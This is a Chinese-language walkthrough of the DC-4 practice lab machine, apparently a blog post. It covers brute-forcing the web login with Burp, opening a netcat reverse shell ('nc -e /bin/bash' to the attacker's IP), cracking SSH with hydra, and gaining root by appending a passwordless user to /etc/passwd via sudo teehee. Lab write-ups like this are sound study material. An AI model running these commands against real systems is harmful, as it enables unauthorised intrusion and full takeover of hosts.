dc4靶机攻略

dc4

扫描

image-20231022163052209

目录扫描

image-20231022163322225

指纹

image-20231022163557899

渗透

该靶机首页即为登录框,此处别无下手,考虑注入或者爆破,注入经过尝试不行,此处选择爆破

image-20231022163133720

使用bp抓包

image-20231022163849210

image-20231022165141573

此处我只猜测了admin和root两个用户

爆出用户信息为

admin:happy

输入信息过后居然没成功,再试一次登录成功

image-20231022165332004

发现代码执行,感觉可以利用

image-20231022165811171

抓包发现命令位置

image-20231022170225467

使用nc进行远程连接此处修改为

nc+-e+/bin/bash+10.4.7.138+12138

成功连接

image-20231022171015501

使用命令回显

python -c 'import pty;pty.spawn("/bin/bash")'

image-20231022171118859

看一下可以登录的用户

image-20231022171948796

发现jim和sam

进入家目录探查

jim目录下这些内容应该是有用的

将旧密码摘过来当字典用

image-20231022173624144

使用hydra爆破

hydra -l jim -P pojie1.txt ssh://10.4.7.147 -V -f -t 50

得到账户信息

image-20231022173757431

jim:jibril04

使用ssh连接登录

image-20231022173855553

常规提权还不行,还得看看用户相关的

登录到jim时,有邮件提示

image-20231022174605605

看到/var/mail下有一封邮件

在这里插入图片描述

得到用户信息

charles:^xHhA&hvim0y

提权

su切换至charles

image-20231022174416809

此时再使用sudo -l就会发现可以使用teehee

image-20231022174457179

利用heetee

echo "orderl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

image-20231022175003471

可以查看passwd文件确认一下

添加完成后su到该用户即为root用户

image-20231022175053970

flag文件就在/root下

可以查看passwd文件确认一下

添加完成后su到该用户即为root用户

flag文件就在/root下

image-20231022175144668

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值